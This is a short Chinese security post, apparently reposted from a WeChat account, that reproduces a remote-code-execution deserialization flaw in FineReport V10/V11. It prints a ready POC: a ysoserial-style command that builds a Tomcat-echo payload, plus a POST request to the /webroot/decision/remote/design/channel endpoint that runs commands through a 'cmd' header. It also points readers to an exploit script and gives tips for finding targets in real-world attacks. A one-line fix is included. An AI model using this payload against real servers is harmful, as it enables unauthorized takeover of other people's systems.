漏洞说明:
帆软 V10 及 V11 版本报表软件存在反序列化漏洞,攻击者可利用该漏洞使用POST 方法向帆软报表软件路径/webroot/decision/remote/design/channel 发送恶意数据包,将二进制数据流或文件加载到服务器内存中触发反序列化操作,从而实现任意代码执行,获取服务器控制权限。
复现:
比较早的一个洞,实战中还是能遇到的。
长这个样子:
建议在字典中增加/webroot/decision/login路径,一般工具扫不出来该路径
漏洞文档POC:
java -jar ysuserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch "cmd" > fine10.bin
POST /webroot/decision/remote/design/channel HTTP/1.1
Content-Type: application/json
Host:
cmd: id
Connection: close
{{gzip(file(fine10.bin))}}
脚本复现命令执行:
python fr.py
有回显可以打,没有就不能打
修复方法:
在服务器端禁用以下目录的访问: ① /webroot/decision/remote/design/channel ② /webroot/ReportServer/
脚本获取:
回复20230908获取
原文始发于微信公众号(安全小子大杂烩):帆软报表软件反序列化漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论